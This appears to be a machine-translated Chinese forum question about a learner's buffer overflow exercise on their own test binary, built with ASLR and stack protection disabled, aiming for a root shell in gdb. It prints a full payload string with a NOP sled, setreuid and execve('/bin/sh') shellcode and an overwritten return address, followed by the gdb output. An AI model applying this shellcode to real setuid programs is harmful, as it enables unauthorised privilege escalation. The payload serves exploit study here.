我正在尝试一种基本的缓冲区溢出攻击,它会产生根shell。我面临着“从子进程分叉后发送 * *”
的问题如何摆脱这种情况并产生根shell?
我正在尝试以普通用户(显然)在我的gdb中生成root shell。 我已经以各种可能的方式编译了易受攻击的程序:我禁用了ALSR ...已禁用DEP ...使用-fno-stack-proctector编译它
当我在我的gdb中运行时,我得到了这个 - >
还有一件事:缓冲区大小为100,并且在120处发生分段错误!
60字节的\ x90 +大小50的shellcode +大小10的“A”(填充)+覆盖的地址(8)=(60 + 50 + 10 = 120; 120 +覆盖的地址= 128)
[bhabi@localhost buffer]$ gdb -q bof
(gdb) r `perl -e 'print "\x90" x 60, "\x48\x31\xc0\x48\x83\xc0\x71\x48\x31\xff\x48\x31\xf6\x0f\x05\xeb\x13\x48\x31\xc0\x48\x83\xc0\x3b\x5f\x88\x67\x07\x48\x31\xf6\x48\x31\xd2\x0f\x05\xe8\xe8\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x4e\x90", "A" x 10, "\x60\xe4\xff\xff\xff\x7f\x00\x00"'`
启动程序:
/home/bhabi/buffer/bof `perl -e 'print "\x90" x 60, "\x48\x31\xc0\x48\x83\xc0\x71\x48\x31\xff\x48\x31\xf6\x0f\x05\xeb\x13\x48\x31\xc0\x48\x83\xc0\x3b\x5f\x88\x67\x07\x48\x31\xf6\x48\x31\xd2\x0f\x05\xe8\xe8\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x4e\x90", "A" x 10, "\x60\xe4\xff\xff\xff\x7f\x00\x00"'
process 7*** is executing new program: /bin/bash
Missing separate debuginfos, use: debuginfo-install glibc-2.14.90-24.fc16.9.x86_64
Detaching after fork from child process 7***.
Detaching after fork from child process 7***.
Detaching after fork from child process 7**.
[bhabi@localhost buffer]$
我期待[root @ localhost buffer] $`
我甚至尝试过
set follow-fork-mode child
set detach-on-fork off